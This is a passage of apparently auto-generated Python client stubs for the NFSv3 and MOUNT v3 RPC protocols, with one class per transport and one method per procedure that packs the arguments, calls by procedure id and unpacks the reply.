procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
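    # Usage sketch (illustrative; host, port, and the args object are
    # placeholders, not from the generated file). Every generated stub
    # follows the same pattern: pack the args, call by procedure id,
    # unpack and return the result.
    #
    #     client = NFS_PROGRAM.RawTCPNFS_V3('nfs.example.com', 2049)
    #     client.NFSPROC3_NULL()                 # ping the server
    #     attrs = client.NFSPROC3_GETATTR(getattr_args)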
class TCPNFS_V3(rpc.TCPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.TCPClient.__init__(self, host, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
class RawUDPNFS_V3(rpc.RawUDPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawUDPClient.__init__(self, host, port, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
class UDPNFS_V3(rpc.UDPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.UDPClient.__init__(self, host, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
def __getitem__(self, key):
d = {
const.RawTCPNFS_V3 : 'RawTCPNFS_V3',
const.TCPNFS_V3 : 'TCPNFS_V3',
const.RawUDPNFS_V3 : 'RawUDPNFS_V3',
const.UDPNFS_V3 : 'UDPNFS_V3'
}
return getattr(self, d[key])
NFS_PROGRAM = NFS_PROGRAM()
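# Illustrative sketch (assumption, not generated code): resolving a client
# class through the dispatch table above and pinging the service. The host
# name is a placeholder; TCPNFS_V3 is assumed to take just a host, like the
# UDP variant.
def _example_nfs_null(host='filer.example.com'):
    client_cls = NFS_PROGRAM[const.TCPNFS_V3]  # maps the constant to the TCPNFS_V3 class
    nfs = client_cls(host)
    nfs.NFSPROC3_NULL()  # procedure 0: no payload, succeeds if the service answers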
class MOUNT_PROGRAM(object):
class RawTCPMOUNT_V3(rpc.RawTCPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawTCPClient.__init__(self, host, port, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
class TCPMOUNT_V3(rpc.TCPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.TCPClient.__init__(self, host, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
class RawUDPMOUNT_V3(rpc.RawUDPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawUDPClient.__init__(self, host, port, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
class UDPMOUNT_V3(rpc.UDPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.UDPClient.__init__(self, host, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
